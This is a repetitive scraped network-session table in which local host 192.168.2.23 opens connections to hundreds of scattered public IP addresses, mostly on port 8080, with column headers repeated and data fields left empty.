                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29797192.168.2.234847854.245.108.1468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29798192.168.2.233953295.147.88.1928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29799192.168.2.2343978142.153.124.1458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29800192.168.2.2356494188.220.229.1478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29801192.168.2.2360950111.177.131.2098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29802192.168.2.2354068210.0.168.2248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29803192.168.2.2337904180.100.164.668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29804192.168.2.233846051.212.4.1168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29805192.168.2.2357998216.63.86.2488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29806192.168.2.235865418.161.111.88080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29807192.168.2.235997878.1.36.48080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29808192.168.2.2350318150.246.250.2138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29809192.168.2.233286459.12.0.1998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29810192.168.2.2335824148.219.15.698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29811192.168.2.2337462148.225.45.1718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29812192.168.2.2351016149.5.238.1118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29813192.168.2.235175871.43.251.708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29814192.168.2.234710480.139.89.178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29815192.168.2.23409088.189.163.1638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29816192.168.2.2350422113.206.103.718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29817192.168.2.2349758169.149.137.988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29818192.168.2.2345738105.129.209.2488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29819192.168.2.2339428140.180.139.2358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29820192.168.2.2349290135.182.161.1148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29821192.168.2.235523654.161.206.1838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29822192.168.2.2359496169.204.96.1908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29823192.168.2.2360262175.50.18.1138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29824192.168.2.235537436.12.238.778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29825192.168.2.23372328.185.2.1838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29826192.168.2.235391025.170.74.758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29827192.168.2.234841889.201.194.2278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29828192.168.2.2360708183.148.114.1708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29829192.168.2.235648099.215.37.1928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29830192.168.2.2346598173.59.39.738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29831192.168.2.235350836.176.155.1568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29832192.168.2.234978886.90.83.428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29833192.168.2.235273424.136.182.1478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29834192.168.2.233451035.104.24.1328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29835192.168.2.2350916130.227.208.2408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29836192.168.2.2341526149.76.71.1768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29837192.168.2.235172296.39.224.258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29838192.168.2.2339790129.137.82.1688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29839192.168.2.234127853.72.161.378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29840192.168.2.234574446.6.172.1478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29841192.168.2.2339700139.85.27.2398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29842192.168.2.234336432.191.195.2068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29843192.168.2.2344996166.219.253.1288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29844192.168.2.234988644.200.212.108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29845192.168.2.234833088.80.243.818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29846192.168.2.233472637.226.38.848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29847192.168.2.2352668222.71.4.1458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29848192.168.2.2345130107.133.115.2328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29849192.168.2.23587702.141.235.1578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29850192.168.2.2352124114.63.54.378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29851192.168.2.2346794104.234.203.998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29852192.168.2.2335968113.74.84.1168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29853192.168.2.235111450.116.227.1268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29854192.168.2.2341564159.247.75.268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29855192.168.2.2340542216.208.7.778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29856192.168.2.234763489.241.27.2388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29857192.168.2.2349146193.74.29.2478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29858192.168.2.2334502153.54.169.1168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29859192.168.2.2352072172.40.233.1538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29860192.168.2.233943423.70.63.738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29861192.168.2.2345224220.31.183.48080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29862192.168.2.234764634.200.32.1128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29863192.168.2.2344120200.233.254.1908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29864192.168.2.2360596137.139.110.328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29865192.168.2.233729681.221.17.488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29866192.168.2.2353168184.211.244.78080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29867192.168.2.2348312133.242.171.738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29868192.168.2.2353596148.228.155.1078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29869192.168.2.235812691.211.132.1058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29870192.168.2.234588020.8.116.2538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29871192.168.2.234986262.175.167.1218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29872192.168.2.233619674.91.56.708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29873192.168.2.2335594173.1.74.2388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29874192.168.2.234688657.70.77.618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29875192.168.2.233608636.77.195.1518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29876192.168.2.2351062211.215.224.2098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29877192.168.2.2352506206.34.166.1898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29878192.168.2.2346506106.149.111.128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29879192.168.2.2339838120.165.52.778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29880192.168.2.2345922116.148.217.2228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29881192.168.2.2336150107.125.142.2368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29882192.168.2.2356256222.73.39.2518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29883192.168.2.234666846.28.99.1108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29884192.168.2.2355682220.152.87.1768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29885192.168.2.235860814.125.6.678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29886192.168.2.233468452.199.138.1238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29887192.168.2.2358474193.53.254.138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29888192.168.2.2351076197.141.6.1737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29889192.168.2.233350899.229.190.17537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29890192.168.2.234771041.82.197.23237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29891192.168.2.2340356181.146.148.1618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29892192.168.2.235193643.215.12.1788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29893192.168.2.2333326121.249.217.318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29894192.168.2.2356108148.188.130.718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29895192.168.2.2359464139.184.25.2268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29896192.168.2.2339242168.116.31.1788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29897192.168.2.2345116211.145.21.238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29898192.168.2.2348282121.46.107.1578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29899192.168.2.2343224117.96.240.1808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29900192.168.2.2359600210.49.89.698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29901192.168.2.2342154102.45.198.1478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29902192.168.2.235039218.10.175.858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29903192.168.2.2352652138.142.169.2208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29904192.168.2.2345840194.9.179.2518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29905192.168.2.2339806181.170.212.528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29906192.168.2.2333562211.13.205.1398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29907192.168.2.2344528182.249.113.728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29908192.168.2.2335928201.19.33.1788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29909192.168.2.2344508179.110.45.1088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29910192.168.2.2354504201.253.56.1968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29911192.168.2.236051866.243.136.878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29912192.168.2.2351784142.47.17.308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29913192.168.2.2337518145.208.12.1398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29914192.168.2.2352324102.74.246.338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29915192.168.2.234219043.11.6.198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29916192.168.2.2337570178.49.26.1848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29917192.168.2.235504645.168.55.118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29918192.168.2.2340698136.123.26.2268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29919192.168.2.2334842111.138.206.1258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29920192.168.2.233490249.226.55.1228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29921192.168.2.2341388201.70.51.2038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29922192.168.2.2343140156.92.180.838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29923192.168.2.235606097.241.115.1158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29924192.168.2.2347890167.212.82.1408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29925192.168.2.2357250117.200.215.268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29926192.168.2.2352380119.221.207.1768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29927192.168.2.2340750220.180.96.1378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29928192.168.2.2335932142.139.138.1948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29929192.168.2.2339378146.209.201.198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29930192.168.2.235560299.204.230.158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29931192.168.2.233793274.36.4.1458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29932192.168.2.2340584141.19.179.128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29933192.168.2.235359819.195.241.2158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29934192.168.2.2342556135.164.32.308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29935192.168.2.2338514162.36.96.528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29936192.168.2.2359906218.19.155.1868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29937192.168.2.2338108196.27.33.1518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29938192.168.2.2343802196.12.90.2278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29939192.168.2.2356348111.118.194.2488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29940192.168.2.2359500115.88.217.1278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29941192.168.2.234965477.17.225.568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29942192.168.2.2351366146.189.174.838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29943192.168.2.2349866200.6.151.708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29944192.168.2.233616017.245.82.568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29945192.168.2.233450883.212.15.858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29946192.168.2.2333932130.144.181.948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29947192.168.2.2338896213.166.75.2308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29948192.168.2.235184620.251.153.1468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29949192.168.2.2351630150.71.161.428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29950192.168.2.235911060.49.183.1778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29951192.168.2.234003276.91.215.1368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29952192.168.2.23403684.200.27.1718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29953192.168.2.2354892134.189.31.458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29954192.168.2.2334928168.242.29.1218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29955192.168.2.2356862186.160.131.1738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29956192.168.2.2346606176.117.203.2278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29957192.168.2.2338320159.71.177.328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29958192.168.2.233727267.132.195.1128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29959192.168.2.233829477.3.128.2488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29960192.168.2.2349676223.112.110.1508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29961192.168.2.2350272143.70.91.1268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29962192.168.2.2337204180.141.105.1628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29963192.168.2.2346208138.135.142.798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29964192.168.2.233753466.247.194.2408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29965192.168.2.234559093.113.14.1068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29966192.168.2.2338724166.24.106.418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29967192.168.2.2360804120.230.141.1848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29968192.168.2.235753674.236.141.268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29969192.168.2.234151638.53.121.18080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29970192.168.2.2337780162.63.187.1258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29971192.168.2.2353562104.175.157.1358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29972192.168.2.2345082159.75.106.1078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29973192.168.2.235201882.84.63.1568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29974192.168.2.2333764104.241.136.1878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29975192.168.2.235275278.27.1.1778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29976192.168.2.2344850203.23.119.2268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29977192.168.2.234889847.73.186.2428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29978192.168.2.235231292.40.33.1678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29979192.168.2.2335572171.35.163.258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29980192.168.2.233580049.37.101.2338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29981192.168.2.233336470.3.198.2238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29982192.168.2.235143859.108.174.948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29983192.168.2.23334108.183.143.2208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29984192.168.2.2344266162.55.241.1018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29985192.168.2.234394254.183.74.2248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29986192.168.2.2358376178.156.72.1168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29987192.168.2.2353962136.210.1.1718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29988192.168.2.2344172167.178.194.968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29989192.168.2.235305443.243.72.968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29990192.168.2.233615094.228.35.2408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29991192.168.2.2359012136.168.151.678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29992192.168.2.2353578177.202.154.318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29993192.168.2.2347018135.220.52.1758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29994192.168.2.2346180128.105.87.988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29995192.168.2.2347392206.9.66.2148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29996192.168.2.2337886112.206.240.918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29997192.168.2.2353992110.194.239.368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29998192.168.2.2345406176.28.125.1998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29999192.168.2.234098491.201.175.78080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30000192.168.2.235093420.55.3.1288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30001192.168.2.234171819.60.70.368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30002192.168.2.2359848101.124.157.1768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30003192.168.2.2333008156.146.187.1748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30004192.168.2.236011441.60.41.208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30005192.168.2.23365724.252.200.2538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30006192.168.2.234239478.203.18.908080
                                                        TimestampBytes transferredDirectionData


